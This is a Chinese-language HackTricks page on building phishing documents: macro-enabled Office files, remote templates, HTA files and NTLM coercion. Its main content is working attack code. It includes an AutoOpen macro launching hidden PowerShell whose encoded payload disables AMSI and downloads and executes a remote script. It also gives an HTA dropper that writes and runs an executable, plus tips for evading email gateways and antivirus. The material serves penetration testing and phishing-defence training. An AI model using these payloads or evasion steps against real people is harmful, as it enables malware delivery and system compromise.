9.4 KiB
钓鱼文件和文档
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks的衣物
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
办公文档
Microsoft Word在打开文件之前会进行文件数据验证。数据验证以数据结构识别的形式进行,根据OfficeOpenXML标准进行验证。如果在数据结构识别过程中发生任何错误,正在分析的文件将不会被打开。
通常,包含宏的Word文件使用.docm扩展名。然而,可以通过更改文件扩展名来重命名文件,并保持其执行宏的能力。
例如,RTF文件不支持宏,但将一个重命名为RTF的DOCM文件将被Microsoft Word处理,并具有执行宏的能力。
相同的内部机制适用于Microsoft Office套件的所有软件(Excel,PowerPoint等)。
您可以使用以下命令检查哪些扩展名将由某些Office程序执行:
assoc | findstr /i "word excel powerp"
DOCX文件引用远程模板(文件-选项-加载项-管理:模板-转到),该模板包含宏,可以“执行”宏。
外部图像加载
转到:插入-->快速部件-->字段
类别:链接和引用,字段名称:includePicture,文件名或URL: http://<ip>/whatever
宏后门
可以使用宏从文档中运行任意代码。
自动加载函数
它们越常见,杀毒软件检测到的可能性就越大。
- AutoOpen()
- Document_Open()
宏代码示例
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
手动删除元数据
转到文件 > 信息 > 检查文档 > 检查文档,这将打开文档检查器。点击检查,然后在文档属性和个人信息旁边点击全部删除。
文档扩展名
完成后,选择另存为类型下拉菜单,将格式从**.docx更改为Word 97-2003 .doc。
这样做是因为你无法在.docx中保存宏**,而且宏启用的**.docm扩展名有一定的负面印象**(例如,缩略图图标上有一个巨大的!,一些网络/电子邮件网关完全阻止它们)。因此,这个传统的.doc扩展名是最好的折衷方案。
恶意宏生成器
HTA文件
HTA是一种专有的Windows程序,其源代码由HTML和一个或多个由Internet Explorer支持的脚本语言组成(VBScript和JScript)。HTML用于生成用户界面,脚本语言用于程序逻辑。HTA在浏览器安全模型的约束之外执行,因此它作为一个"完全可信任"的应用程序执行。
HTA使用**mshta.exe执行,通常与Internet Explorer一起安装**,因此**mshta依赖于IE**。因此,如果IE被卸载,HTA将无法执行。
<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function
Pwn
</script>
</html>
<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function
var_func
self.close
</script>
强制 NTLM 认证
有几种方法可以**"远程"强制 NTLM 认证**,例如,您可以在电子邮件或用户将访问的 HTML 中添加不可见图像(甚至是 HTTP MitM?)。或者向受害者发送文件地址,这将触发一个认证,只需打开文件夹即可。
在以下页面中查看这些想法和更多内容:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %} places-to-steal-ntlm-creds.md {% endcontent-ref %}
NTLM 中继
不要忘记,您不仅可以窃取哈希或认证,还可以执行 NTLM 中继攻击:
☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在 HackTricks 中看到您的公司广告吗?或者您想获得PEASS 的最新版本或下载 HackTricks 的 PDF 版本吗?请查看订阅计划!
- 发现我们的独家 NFTs 集合 The PEASS Family
- 获取官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或 telegram 群组,或者在 Twitter 上关注我 🐦@carlospolopm。
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享您的黑客技巧。